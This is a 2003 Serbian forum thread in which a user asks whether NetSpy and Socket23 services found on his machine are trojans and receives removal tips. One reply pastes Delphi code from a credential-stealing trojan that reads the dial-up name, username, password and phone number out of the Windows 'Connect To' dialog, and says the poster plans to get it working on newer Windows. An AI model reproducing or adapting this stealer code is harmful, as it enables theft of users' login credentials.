MyCity » Zaštita od zlonamernih programa » Trojanci? Socket23 i NetSpy. Jesu ili nisu

Trojanci? Socket23 i NetSpy. Jesu ili nisu

Napisano na dan: 11.6.2003

Trojanci? Socket23 i NetSpy. Jesu ili nisu
Sledeća strana Pagination

Idi na vrh

Poslao: 11 Jun 2003 10:18
Idi na vrh
offline
  • berag 
  • Novi MyCity građanin
  • Pridružio: 11 Jun 2003
  • Poruke: 1

NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000.
Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni.
U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim.
Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 11 Jun 2003 11:21
Idi na vrh
offline
  • Pridružio: 20 Apr 2003
  • Poruke: 2091
  • Gde živiš: Novi Sad

evo da preduhitrim Puky-ja ;-)
[Link mogu videti samo ulogovani korisnici]

pa pogledaj tamo.



Poslao: 11 Jun 2003 12:02
Idi na vrh
offline
  • Pridružio: 17 Apr 2003
  • Poruke: 488
  • Gde živiš: Niš

Potrazi na:
[Link mogu videti samo ulogovani korisnici] ili
[Link mogu videti samo ulogovani korisnici]

Poslao: 11 Jun 2003 18:35
Idi na vrh
offline
  • Puky  Male
  • Scottish rebel
  • Pridružio: 18 Apr 2003
  • Poruke: 5815
  • Gde živiš: u Zmajevom gnjezdu

Drax ::evo da preduhitrim Puky-ja ;-)
[Link mogu videti samo ulogovani korisnici]
pa pogledaj tamo.

TNX za antireklamu jer nemam te opise na sajtu. Wink

@ Berag
Zapamti koji su to fajlovi pa pogledaj u listi procesa pa ih iskljuci.
A dodatno pogledaj u registartskoj bazi da li se startuju.

Poslao: 21 Jun 2003 11:41
Idi na vrh
offline
  • Pridružio: 21 Jun 2003
  • Poruke: 65
  • Gde živiš: Serbia/Pancevo

berag ::NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000.
Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni.
U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim.
Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.

Joj netspy to je programirao moj ortak i ja sam hteo da izbacim koji trojan ali posto je izasao win2k i XP malo su se neke stvari promenile pa me je mrzelo da otkrivam gde drzi dial up passworde dok je kod win98 sve bilo lako samo izvadis handle iz prozora i povadis text iz field-ova prosto ko pasulj...

Citat:
function KRADI(hChild: hWnd; param: dWord): bool; stdcall;
var
tmp: pchar;
tmp2: string;
begin
getmem(tmp, 1025);
SendMessage(hChild, WM_GETTEXT, 1024, longint(tmp));
tmp2 := StrPas(tmp);
case brojac of
DUP_NAME: STOLEN_DIALUP := tmp2;
DUP_USER: STOLEN_USER := tmp2;
DUP_PASS: STOLEN_PASS := tmp2;
DUP_PHONE: STOLEN_PHONE := tmp2;
end;
freemem(tmp, 1025);
inc(brojac);
end;


i onda samo pozovete i napravite ako nadje prozor Connect to:
Citat:
wnd := FindWindow(nil, 'Connect To');
if iswindow(wnd)=true then
begin
repeat
Waiting := 30;
Brojac := 0;
EnumChildWindows(wnd, @KRADI, 0);
CurData := STOLEN_DIALUP+':'+STOLEN_USER+':'+STOLEN_PASS+':'+STOLEN_PHONE;

Uglavnom ocajno bedan security :-)

Poslao: 21 Jun 2003 12:14
Idi na vrh
offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23211
  • Gde živiš: Niš

cini mi se da je to na weird-ovom sajtu bilo, pre 3-4 godina...
mislim da ovo ne radi na novijim windowsima, na XP recimo

Poslao: 21 Jun 2003 14:02
Idi na vrh
offline
  • Pridružio: 21 Jun 2003
  • Poruke: 65
  • Gde živiš: Serbia/Pancevo

Ma to je bilo svugde nije ni vazno pa ne radi na win2k i XP-u zato sto passworde drze negde drugde cim izvalim gde radice Smile

MyCity » Zaštita od zlonamernih programa » Trojanci? Socket23 i NetSpy. Jesu ili nisu

Ko je trenutno na forumu
 

Ukupno su 1885 korisnika na forumu :: 116 registrovanih, 14 sakrivenih i 1755 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 6018 - dana 19 Dec 2025 13:41

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: 357magnum, airsuba, alex71, ArmFPGA, belov, Betta, Bickoooo, Bivan, bojcistv, bokisha253, boromir, Borx, borya90, Bosnjo, boxbole, BZ, Chainsaw, Cicumile, dane007, darkkran, Dejan_vw, Deki Duga Devetka, Dimitrije Paunovic, Dioniss, djuradj, Doc, dolinalima, draganl, drgrozozo, Duh sa sekirom, DzaveSilni, Electron, ElvisP, EXIT78, fićo32, Fliper, Futog 74, Gall, Gibli, Grabovnica, Hans Gajger, HogarStrashni, igorkozar83, ivan_8282, Jan, Jeremiah, jodzula, Joksss, kaisarevic1, Kajzer Soze, koneks, KonstantinR, laki_bb, Limeni91, ljubo70, LostInSpaceandTime, luka35, M74AB3, Manjane, marera, Marko Marković, mercedesamg, Mercury, mexo, miki kv, Miki01, milbos, mile.ilic75, milenko crazy north, MiljanXD, Milos ZA, Milovan Dinic, Mirage 2000N, Moldovan, morava_01, Natuzzi, Naum T, offman, opt1, Paklenica, Pegggio, pein, pisac12, PlayerOne, Polifon, Povratak1912, predragc, proka89, Putnik22, R_038, rakivan, RD84, sajorg, sale755, Sava89, silver22, Siti2, Su 57, suton, tajvankanasta, tamno.nebo, UAV operator, varda, vidra1, VJ, Vlad000, voja64, vojnik švejk, vrag81, vukajlo71, yip314, Zastava, zlatkoa987, Zoran1959, ZZZ, 2001